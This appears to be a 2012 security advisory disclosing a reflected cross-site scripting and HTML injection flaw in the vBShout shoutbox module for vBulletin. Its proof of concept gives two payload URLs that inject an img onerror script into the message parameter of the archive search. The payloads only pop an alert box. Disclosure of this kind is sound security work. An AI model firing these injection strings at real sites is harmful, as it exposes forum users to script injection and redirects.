# Title: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) -
Reflected Cross-Site Scripting ( XSS )
# Note: HTML Injection and Redirect works too
# Script Page : http://www.dragonbyte-tech.com
# Date: 24-03-2012
# Author : Avram Marius Gabriel (d3v1l)
# RandomStorm - http://www.randomstorm.com
# Tested on: Windows XP & Vista
###############################################################################################################
# The last version of vBulletin vBShout Module suffers from Cross-Site
Scripting and HTML Injection
The issue is located in Shoutbox Search Archive
# POC:
# http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img
src=1
onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]
=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1
# http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img
src=1 onerror=alert("XSS")>&s=&do=archive&instanceid=1
################################################################################################################
# vBShout is the ideal way to keep members on your forum while they wait
for replies to their posts.
It can be used in many ways - as a chat room for members, for staff to
discuss issues in realtime,
as a live-update feed of new posts and threads, as a way to track member
milestones
################################################################################################################
--
Check My Blog <http://security-sh3ll.blogspot.com> or Follow me on
Twitter<http://twitter.com/securityshell>
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum